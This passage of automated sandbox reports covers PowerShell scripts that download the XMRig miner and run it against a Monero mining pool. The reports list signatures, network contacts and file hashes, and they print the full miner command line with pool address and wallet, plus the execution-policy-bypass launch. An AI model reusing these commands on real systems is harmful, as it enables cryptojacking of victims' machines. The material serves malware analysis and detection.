"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1w31ujq.rbm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3376 wrote to memory of 4224 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3376 wrote to memory of 4224 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eedo4vtr.zmm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 1904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4840 wrote to memory of 1904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqyef2ao.atp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4148 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4148 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vjsiu44f.dj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win11-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 1436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 1436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yjs5oexd.q12.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:33
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4880 wrote to memory of 3856 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4880 wrote to memory of 3856 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 184.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieyrhmxw.ify.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
